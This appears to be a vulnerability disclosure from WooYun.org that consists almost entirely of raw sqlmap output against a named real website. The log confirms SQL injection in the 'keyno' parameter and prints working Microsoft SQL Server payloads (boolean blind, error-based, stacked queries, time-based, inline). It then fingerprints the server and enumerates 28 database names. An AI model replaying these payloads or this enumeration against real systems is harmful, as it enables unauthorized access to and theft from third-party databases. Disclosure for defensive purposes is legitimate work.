WooYun.org

GET parameter 'keyno' is vulnerable. Do you want to keep testing the others (ifany)? [y/N] Nsqlmap identified the following injection points with a total of 52 HTTP(s) requests:---Place: GETParameter: keyno    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: keyno=9926 AND 2281=2281    Type: error-based    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause    Payload: keyno=9926 AND 4352=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(103)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (4352=4352) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(108)+CHAR(106)+CHAR(97)+CHAR(113)))    Type: stacked queries    Title: Microsoft SQL Server/Sybase stacked queries    Payload: keyno=9926; WAITFOR DELAY '0:0:5'--    Type: AND/OR time-based blind    Title: Microsoft SQL Server/Sybase time-based blind    Payload: keyno=9926 WAITFOR DELAY '0:0:5'--    Type: inline query    Title: Microsoft SQL Server/Sybase inline queries    Payload: keyno=(SELECT CHAR(113)+CHAR(120)+CHAR(103)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (1477=1477) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(108)+CHAR(106)+CHAR(97)+CHAR(113))---[13:59:33] [INFO] testing Microsoft SQL Server[13:59:34] [INFO] confirming Microsoft SQL Server[13:59:37] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.1back-end DBMS: Microsoft SQL Server 2000[13:59:37] [INFO] fetching database names[13:59:38] [INFO] the SQL query used returns 28 entries[13:59:39] [INFO] retrieved: agent[13:59:40] [INFO] retrieved: auction[13:59:41] [INFO] retrieved: axqy[13:59:41] [INFO] retrieved: binzhouyuanlin[13:59:42] [INFO] retrieved: bxxsp[13:59:43] [INFO] retrieved: bysbd[13:59:44] [INFO] retrieved: bzyrcrm[13:59:45] [INFO] retrieved: crm[13:59:46] [INFO] retrieved: hmrc[13:59:46] [INFO] retrieved: ispdata[13:59:47] [INFO] retrieved: jfcx[13:59:48] [INFO] retrieved: master[13:59:49] [INFO] retrieved: menhuagent[13:59:50] [INFO] retrieved: model[13:59:51] [INFO] retrieved: msdb[13:59:51] [INFO] retrieved: newbeian[13:59:52] [INFO] retrieved: newbeiangcl[13:59:53] [INFO] retrieved: newgclcrm[13:59:54] [INFO] retrieved: newpaimai[13:59:55] [INFO] retrieved: Northwind[13:59:55] [INFO] retrieved: pubs[13:59:56] [INFO] retrieved: snmdb[13:59:57] [INFO] retrieved: tempdb[13:59:58] [INFO] retrieved: toupiao[13:59:59] [INFO] retrieved: wyww[14:00:00] [INFO] retrieved: wywwagent[14:00:01] [INFO] retrieved: yantai[14:00:01] [INFO] retrieved: yantaiceshiavailable databases [28]:[*] agent[*] auction[*] axqy[*] binzhouyuanlin[*] bxxsp[*] bysbd[*] bzyrcrm[*] crm[*] hmrc[*] ispdata[*] jfcx[*] master[*] menhuagent[*] model[*] msdb[*] newbeian[*] newbeiangcl[*] newgclcrm[*] newpaimai[*] Northwind[*] pubs[*] snmdb[*] tempdb[*] toupiao[*] wyww[*] wywwagent[*] yantai[*] yantaiceshi[14:00:02] [INFO] fetched data logged to text files under 'C:\Documents and Settings\Administrator\.sqlmap\output\www.sdchunxiang.com'